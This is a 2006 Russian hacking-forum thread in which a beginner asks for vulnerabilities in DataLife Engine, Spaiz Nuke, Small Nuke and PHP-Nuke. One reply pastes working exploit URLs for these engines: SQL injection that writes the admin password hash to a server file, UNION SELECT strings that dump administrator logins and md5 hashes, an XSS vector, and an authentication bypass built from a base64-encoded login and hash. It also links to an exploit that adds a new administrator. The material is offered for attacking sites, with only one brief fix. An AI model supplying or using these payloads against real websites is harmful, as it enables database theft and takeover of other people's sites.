ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Насчёт уязвимостей движков для сайта
  #1  
Старый 13.09.2006, 21:42
Aztec
Новичок
Регистрация: 13.09.2006
Сообщений: 6
Провел на форуме:
4236

Репутация: 0
По умолчанию Насчёт уязвимостей движков для сайта

Сосбтвенно начинаю изучать хакинг и хотел бы узнать уязвимости в движках, как Data Life, Small Nuke, Spaiz Nuke, Php Nuke. (помоему самые распространённые).
Ненадно только меня посылать в поиск, так как там ничего ненашёл, темболее он неработает... Спасибо заранее
 
Ответить с цитированием

  #2  
Старый 13.09.2006, 21:51
r0
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме:
1665310

Репутация: 488
По умолчанию

Зайди в раздел ниже. прикрепленные темы
хы я все равно пошлю в поиск ибо он работает)
 
Ответить с цитированием

  #3  
Старый 13.09.2006, 23:08
Aztec
Новичок
Регистрация: 13.09.2006
Сообщений: 6
Провел на форуме:
4236

Репутация: 0
По умолчанию

Ладно, поищу, но у меня почему-то неработает поиск, какую-то ошибку выдаёт
 
Ответить с цитированием

  #4  
Старый 14.09.2006, 00:04
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Data Life

[CODE]Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

http://[host]/index.php?subaction=userinfo&user=Spaiz Nuke

[CODE]Уязвимость существует из-за недостаточной обработки входных данных в параметре "query" сценария "modules.php". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[victim]/modules.php?name=Articles&file=search&query=
Код:
&type=articles&type=comments
Код:
Описание: Несколько уязвимостей обнаружено в Spaiz-Nuke и PHP-nuke. Удаленный пользователь может выполнить произвольный Sql код на уязвимой системе. Удаленный пользователь может получить доступ к системе без пароля. 

1. sql-кода в модуле администрирования

Уязвимость обнаружена в сценарии auth.php в функции проверки логина и пароля. Атакующий может получить зашифрованный пароль администратора. Отсутствие проверки ввода обнаружено в переменной $aid содержащей логин для авторизации. Используя кавычку можно перенаправить вывод в произвольный файл на сервере. Эксплоит: 

www.site.com/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%
20'/path_to_file/pwd.txt 
(проверялось только на spaiz-nuke) После ввода данной строки в браузере на уязвимом сервере будет создан файл /path_to_file/pwd.txt содержащий зашифрованный пароль для логина "Admin". 

Решение: 

Включите magic_quotes_gpc в php.ini файле 

2. Внедрение sql-кода в модуле web_links

Отсутствие проверки ввода обнаружено в переменной $cid в модуле web-links. Атакующий может внедрить произвольный sql-код. 

Эксплоит: 

Следующий эксплоит показывает пример получения логинов и зашифрованных паролей администраторов движка. Работает на БД поддерживающих команду UNION (mysql>4) Для других БД необходимо изменять вид sql-запроса. 
Для php-nuke 

Данная строка выдаст все логины: 

www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%
20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
Данная строка выдаст все зашифрованные пароли: 

www.site.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%
20counter,%20pwd,%20aid%20FROM%20nuke_authors%20--
Для spaiz-nuke 

Изменить nuke_authors в строке на spnuke_authors 3. Внедрение sql-кода в модуле download * 

Эксплоит: 
Для php-nuke 

www.site.com/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%
20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
Для spaiz-nuke также как и в предыдущем случае. 
4. Доступ без расшифровки пароля 

Пароли данного движка шифруются с помощью алгоритма md5 однако атакующий может получить доступ даже не зная расшифрованного пароля. 

Эксплоит: 

Сначала следует зашифровать полученные логин и зашифрованный md5 пароль с помощью алгоритма base64. 

Сделать это можно например здесь: http://www.isecurelabs.com/base64.php Шифруем этим алгоритмом следующую строку: 

login:crypt_passwd:
где 
login=логин 
crypt_passwd=зашифрованный пароль.
Получаем хеш. 

Например для admin:21232f297a57a5a743894a0e4a801fc3: хеш будет следующим: 

YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM6 

Теперь можно получить доступ к панели администрирования используя следующий урл: 

www.site.com/admin.php?admin=ваш_хэш
Вручную использование данной уязвимости немного неудобно поэтому был написан сплоит позволяющий добавить нового администратора со всеми правами. Посмотреть сплоит можно здесь: http://rst.void.ru/download/r57nuke.txt

Php Nuke

Код:
Не стал о каждой дыре писать ибо много.
Вот зайди http://www.securitylab.ru/vulnerability/index.php?arrFilter_ff%5BSECTION_ID%5D=&arrFilter_ff%5BSEARCHABLE_CONTENT%5D=Php+Nuke&set_filter=%D4%E8%EB%FC%F2%F0&set_filter=Y
и читай
 
Ответить с цитированием

  #5  
Старый 14.09.2006, 00:11
Aztec
Новичок
Регистрация: 13.09.2006
Сообщений: 6
Провел на форуме:
4236

Репутация: 0
По умолчанию

Ой, выложите пожалуйста ещё уязвимости Small Nuke и будет вообще класс...
 
Ответить с цитированием

  #6  
Старый 14.09.2006, 00:48
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

Про Small Nuke ничё не нашол(( Даже на securityfocus.com ничё нету
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Создание сети: обжимка проводов petrovich-lamer Windows 13 02.07.2007 13:18
Софт для мобильных телефонов под *nix Grrl Сотовый фрикинг 2 02.03.2007 01:47
Редактирование содежимого прошивок для Самсунгов Digimortal Схемы и программы 3 28.02.2007 14:22
какОй трой ИСпоЛЬзоваТЬ длЯ поЛНого УПРАвЛЕиЕ уд.КОМПОМ? UnKn0wN E-Mail 32 08.04.2006 04:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ